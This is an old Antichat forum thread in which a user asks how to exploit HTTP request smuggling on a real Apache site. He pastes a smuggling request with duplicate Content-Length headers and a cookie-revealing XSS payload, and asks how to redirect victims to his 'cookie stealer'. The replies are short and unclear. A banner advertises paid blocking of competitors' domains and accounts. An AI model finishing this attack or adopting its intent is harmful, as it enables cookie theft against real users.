Форум АНТИЧАТ - Http request smuggling

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Оффтоп > Forum for discussion of ANTICHAT
Http request smuggling

Опции темы

Поиск в этой теме

Опции просмотра

Http request smuggling

10.10.2005, 20:58

caffine2

Новичок

Регистрация: 11.08.2005

Сообщений: 6

Провел на форуме:
12994

Репутация: 0

Http request smuggling

Hi,
I found a site vulnerable to http request smuggling it runs an apache server. I have been looking up information on this all day yet the stuff that i find doesent explain it verry well! i know that it has to be sent to the site through packets but what i dont understand is how could i use

Код:

Code:
1 POST /some_script.jsp HTTP/1.0
2 Connection: Keep-Alive
3 Content-Type: application/x-www-form-urlencoded
4 Content-Length: 9
5 Content-Length: 204
6
7 this=thatPOST /vuln_page.jsp HTTP/1.0
8 Content-Type: application/x-www-form-urlencoded
9 Content-Length: 95
10
11 param1=value1&data=<script>alert("stealing%20your%20data:"%
2bdocument.cookie)</script>&foobar=

Now i know that does xss but how would i get that to redirect to my cookie stealer. also would that be what im looking for if i want to exploit the server ? well thank you for spending the time to read this (and i did check google for the information, but it didnt sufice)
sincerly
Crimson-Jolt

ps im using inet crack for spoofing

[/code]

10.10.2005, 21:36

qBiN

Постоянный

Регистрация: 20.01.2005

Сообщений: 899

Провел на форуме:
1535446

Репутация: 182

Отправить сообщение для qBiN с помощью ICQ

$date put in cookie?

11.10.2005, 03:42

caffine2

Новичок

Регистрация: 11.08.2005

Сообщений: 6

Провел на форуме:
12994

Репутация: 0

I dont understand either of your post's can you elaborate more........
thanks

17.10.2005, 19:44

qBiN

Постоянный

Регистрация: 20.01.2005

Сообщений: 899

Провел на форуме:
1535446

Репутация: 182

Sorry my English is bad))
So if $data take in cookie,then http request smuggling maybe done
You can translate this Russian sentensis:
Если переменная $data берется из cookies,то http request smuggling может получится.

17.10.2005, 23:01

PEPSICOLA

Познавший АНТИЧАТ

Регистрация: 14.10.2004

Сообщений: 1,162

Провел на форуме:
5619724

Репутация: 2944

if variable $data you take from cookie, then.... =)

17.10.2005, 23:13

m0nzt3r

ветеран

Регистрация: 22.06.2004

Сообщений: 2,128

Провел на форуме:
5355463

Репутация: 2258

as i know this bug is very stupid=) i found one day this bug in one script, and i couldn`t do something except giving me cookie by server named as i wanted=) there in docs were something that we could set header location or something like that..

__________________

Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze

17.10.2005, 23:14

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

this bug is called HTTP Response splitting...

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Http - аутентификация	alexandroff	PHP, PERL, MySQL, JavaScript	5	19.07.2005 21:00
Http 405 - запрещенный ресурс	Xekcyc	Чаты	2	21.04.2005 19:56
Идея брутофорса асек через Http запросы.	FUNTiK	Комментарии к видео	20	05.03.2005 20:14
Http протоколы. Algol! Это наверно к тебе!!!	(-=util=-)	Чаты	12	06.12.2004 02:33

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход